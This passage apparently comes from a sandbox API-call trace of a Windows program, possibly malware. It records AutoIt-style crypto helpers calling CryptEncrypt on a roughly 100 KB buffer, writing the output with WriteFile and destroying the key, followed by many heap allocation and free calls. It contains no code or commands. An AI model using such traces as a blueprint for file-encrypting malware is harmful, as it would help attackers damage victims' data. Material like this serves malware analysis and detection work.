lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.795] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x18cfb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x18d00) returned 1 [0103.795] CharLowerBuffW (in: lpsz="byte[101633]", cchLength=0xc | out: lpsz="byte[101633]") returned 0xc [0103.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0103.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cada8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0103.799] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b2d10*, pdwDataLen=0x144e088*=0x18cfb, dwBufLen=0x18d00 | out: pbData=0x49b2d10*, pdwDataLen=0x144e088*=0x18d00) returned 1 [0103.799] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0103.799] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.800] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x18d00, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x18d00, lpOverlapped=0x0) returned 1 [0103.804] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0103.804] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0103.804] CryptDestroyKey (hKey=0x41ac540) returned 1 [0103.804] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0103.804] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.083] TranslateMessage (lpMsg=0x144e404) returned 0 [0104.083] DispatchMessageW (lpMsg=0x144e404) returned 0x0 [0104.083] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0104.083] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0104.083] PeekMessageW (in: lpMsg=0x144e404, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e404) returned 0 [0104.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0104.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0104.083] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0104.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0104.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0104.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0104.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0104.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0104.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0104.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0104.084] PeekMessageW (in: lpMsg=0x144e23c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e23c) returned 0 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0104.084] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0104.084] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.084] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.084] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.084] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0104.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0104.085] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0104.085] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0104.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0104.086] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0104.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0104.086] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0104.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0104.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0104.086] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.086] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0104.087] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0104.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0104.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0104.087] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0104.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0104.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0104.087] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0104.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b90 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0104.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0104.088] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0104.088] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0104.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0104.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0104.088] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0104.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0104.088] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.089] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0104.089] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0104.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0104.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0104.089] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.090] PeekMessageW (in: lpMsg=0x144e54c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e54c) returned 0 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0104.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.090] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 